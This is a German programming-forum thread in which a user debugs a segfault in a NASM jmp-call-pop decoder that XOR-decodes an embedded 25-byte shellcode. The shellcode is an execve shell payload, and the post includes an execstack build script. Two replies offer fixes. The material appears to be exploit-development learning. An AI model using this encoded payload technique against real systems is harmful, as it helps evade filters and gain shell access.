Hypercell ein ] Hypercell aus ] Zeige Navigation ] Verstecke Navigation ]
c++.net  
   

Die mobilen Seiten von c++.net:
https://m.c-plusplus.net

  
C++ Forum :: Assembler ::  Segmentation Fault (x86 Assembler(nasm), Ubuntu, 32-Bit)     Zeige alle Beiträge auf einer Seite Auf Beitrag antworten
Autor Nachricht
asd1
Mitglied

Benutzerprofil
Anmeldungsdatum: 22.06.2007
Beiträge: 25
Beitrag asd1 Mitglied 08:16:28 15.12.2015   Titel:   Segmentation Fault (x86 Assembler(nasm), Ubuntu, 32-Bit)            Zitieren

Hallo,
ich habe leider ein Problem beim Ausführen des u.g. Code. Ich habe es unter Ubuntu LTS 14.04 und 12.04 (beide LTS, beide 32-Bit) ausprobiert. Quittiert wird es mit einem Speicherabzugsfehler.
Es soll jedes Byte eines Shellcodes mit 0xAA per XOR verknüpft werden. Es wird die sog. jmp-call-pop Technik angewendet. Verantwortlich für den Absturz ist
Assembler:
xor byte [esi], 0xAA

Der Zugriff auf den linken Operand ist nicht möglich. Irgendjemand eine Idee?

Kompiliert habe ich mit:
Code:
#!/bin/bash
nasm -f elf32 -o $1.o $1.nasm
ld -z execstack -o $1 $1.o
echo '[+] Done!'



Assembler:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
global _start          
 
section .text
_start:
 
    jmp short call_decoder
 
decoder:
    pop esi
    xor ecx, ecx
    mov cl, 25
 
 
decode:
    xor byte [esi], 0xAA
    inc esi
    loop decode
 
    jmp short Shellcode
 
 
 
call_decoder:
 
    call decoder
    Shellcode: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
nachtfeuer
Moderator

Benutzerprofil
Anmeldungsdatum: 08.04.2010
Beiträge: 2060
Beitrag nachtfeuer Moderator 15:48:08 15.12.2015   Titel:              Zitieren

Verwende doch einfach die jmp-call pop-Technik, um in willigere Datenbereiche zu kommen.

_________________
https://www.youtube.com/watch?v=OLZ8jYHRdFw
http://www.maerchen.com/g ....... -die-sieben-geisslein.php
http://www.dielottozahlende.net
supernicky
Mitglied

Benutzerprofil
Anmeldungsdatum: 06.11.2011
Beiträge: 201
Beitrag supernicky Mitglied 23:40:28 15.12.2015   Titel:              Zitieren

deine Zeile 9 macht mit
Assembler:
mov esi, Shellcode


mehr Sinn.
Du weisst doch so garnicht welchen Wert esi mit pop in Zeile 9 bekommt. :confused: Das wird dann die nicht vorhandene Page sein.

Nicky
C++ Forum :: Assembler ::  Segmentation Fault (x86 Assembler(nasm), Ubuntu, 32-Bit)   Auf Beitrag antworten

Zeige alle Beiträge auf einer Seite




Nächstes Thema anzeigen
Vorheriges Thema anzeigen
Sie können Beiträge in dieses Forum schreiben.
Sie können auf Beiträge in diesem Forum antworten.
Sie können Ihre Beiträge in diesem Forum nicht bearbeiten.
Sie können Ihre Beiträge in diesem Forum nicht löschen.
Sie können an Umfragen in diesem Forum nicht mitmachen.

Powered by phpBB © 2001, 2002 phpBB Group :: FI Theme

c++.net ist Teilnehmer des Partnerprogramms von Amazon Europe S.à.r.l. und Partner des Werbeprogramms, das zur Bereitstellung eines Mediums für Websites konzipiert wurde, mittels dessen durch die Platzierung von Werbeanzeigen und Links zu amazon.de Werbekostenerstattung verdient werden kann.

Die Vervielfältigung der auf den Seiten www.c-plusplus.de, www.c-plusplus.info und www.c-plusplus.net enthaltenen Informationen ohne eine schriftliche Genehmigung des Seitenbetreibers ist untersagt (vgl. §4 Urheberrechtsgesetz). Die Nutzung und Änderung der vorgestellten Strukturen und Verfahren in privaten und kommerziellen Softwareanwendungen ist ausdrücklich erlaubt, soweit keine Rechte Dritter verletzt werden. Der Seitenbetreiber übernimmt keine Gewähr für die Funktion einzelner Beiträge oder Programmfragmente, insbesondere übernimmt er keine Haftung für eventuelle aus dem Gebrauch entstehenden Folgeschäden.